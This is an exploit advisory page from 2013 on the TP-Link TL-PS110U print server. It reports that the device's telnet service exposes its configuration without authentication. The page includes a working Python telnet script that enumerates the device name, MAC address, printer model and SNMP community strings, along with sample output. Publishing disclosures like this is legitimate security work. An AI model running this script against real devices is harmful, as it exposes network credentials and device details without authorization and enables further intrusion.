TP-Link Print Server TL PS110U Information Enumeration

2013-06-20 / 2013-06-21
Credit: SANTHO
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: TP-Link Print Server Sensitive Information Enumeration # Exploit Author: SANTHO # Vendor Homepage: http://www.tp-link.com # Software Link: http://www.tp-link.com/en/products/details/?model=TL-PS110U # Version: TL PS110U TP-Link TL PS110U Print Server runs telnet service which enables an attacker to access the configuration details without authentication. The PoC can extract device name, MAC address, manufacture name, Printer model, and SNMP Community Strings. *Sample Output* root@bt# ./tplink-enum.py 10.0.0.2 Device Name : 1P_PrintServABCD Node ID : AA-AA-AA-AA-AA-AA Manufacture: Hewlett-Packard Model: HP LaserJet M1005 Community 1: public Read-Only Community 2: public Read-Only import telnetlib import sys host = sys.argv[1] tn = telnetlib.Telnet(host) tn.read_until("Password:") tn.write("\r\n") tn.read_until("choice") tn.write("1\r\n") tn.read_until("choice") tn.write("1\r\n") data = tn.read_until("choice") for i in data.split("\r\n"): if "Device Name" in i: print i.strip() if "Node ID" in i: print i.strip() tn.write("0\r\n") tn.read_until("choice") tn.write("2\r\n") data = tn.read_until("choice") for i in data.split("\r\n"): if "Manufacture:" in i: print i.strip() if "Model:" in i: print i.strip() tn.write("0\r\n") tn.read_until("choice") tn.write("5\r\n") data = tn.read_until("choice") for i in data.split("\r\n"): if "Community" in i: print i.strip()

References:

http://www.tp-link.com/en/products/details/?model=TL-PS110U


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top